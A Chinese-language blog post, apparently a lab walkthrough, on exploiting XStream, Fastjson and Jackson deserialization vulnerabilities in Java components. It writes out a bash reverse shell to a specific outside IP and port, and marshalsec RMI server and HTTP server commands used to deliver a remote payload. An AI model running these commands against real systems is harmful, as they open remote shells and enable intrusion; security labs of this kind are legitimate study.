当前位置: 首页 > news >正文

Java安全-组件安全

一、Xstream

启动环境并访问

接下来我们构造反弹shell语句,bash -i >& /dev/tcp/8.152.2.86/9999 0>&1,紧接着对其进行base64编码。

接下来使用命令即可
首先开启监听
接下来执行命令
接下来抓包对其进行payload构造即可
紧接着回去查看回显
发现成功引用,查看回弹即可

二、fastjson

首先启动环境并访问

我们写一个反弹shell的文件。

紧接着对其编译

紧接着开启监听python3 -m http.server 4444

紧接着查看网站目录即可看到该文件,紧接着我们将其绑定到我们的端口java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://8.152.2.86:4444/#TouchFile" 7788

紧接着发送payload即可

三、Jackson

首先启动环境并访问

进入到容器查看tmp目录下的文件

紧接着我们构造payload进行攻击

接下来我们进行攻击

返回查看即可

至此结束!

http://www.dtcms.com/a/322353.html

相关文章:

  • 哈希与安全
  • Red Hat Enterprise Linux 7.9安装Oracle 11.2.0.4单实例数据库-图文详解
  • urmom damn the jvm
  • vscode/trae 的 settings.json 中配置 latex 的一些记录
  • QT环境搭建
  • 数学学习 | 高数、线代、概率论及数理统计荐书
  • 【Task2】【Datawhale AI夏令营】多模态RAG
  • 图片拆分工具,自定义宫格切割
  • 第4章 程序段的反复执行4.2while语句P128练习题(题及答案)
  • CVPR中深度学习新范式:通用性、鲁棒性与多模态的创新突破
  • 六、CV_图像增强方法
  • Python 程序设计讲义(66):Python 的文件操作——数据的处理
  • 多模态RAG赛题实战--Datawhale AI夏令营
  • 计算BERT-BASE参数量
  • 基于windows10/11的可用的自动日记启动脚本
  • Irix HDR Pro:专业级 HDR 图像处理软件
  • STM32H503不同GPIO速度配置(HAL库)对应的最高速度
  • Linux网络转发系统框架分析
  • 栈和队列应用实操
  • RAGFoundry:面向检索增强生成的模块化增强框架
  • 深入剖析Spring MVC核心原理:从请求到响应的魔法解密
  • 如何在linux(CentOS7)上面安装 jenkins?
  • linux php版本降级,dnf版本控制
  • 【LeetCode 热题 100】(五)普通数组
  • 贪心----1.买卖股票的最佳时机
  • 【JS-8-Json】深入理解JSON语法及Java中的JSON操作
  • AutoML 的下半场——从“模型选择”到“端到端业务闭环”
  • 集成电路学习:什么是RQT图形用户界面工具
  • USRP X310 X410 参数对比
  • 区块链密码学简介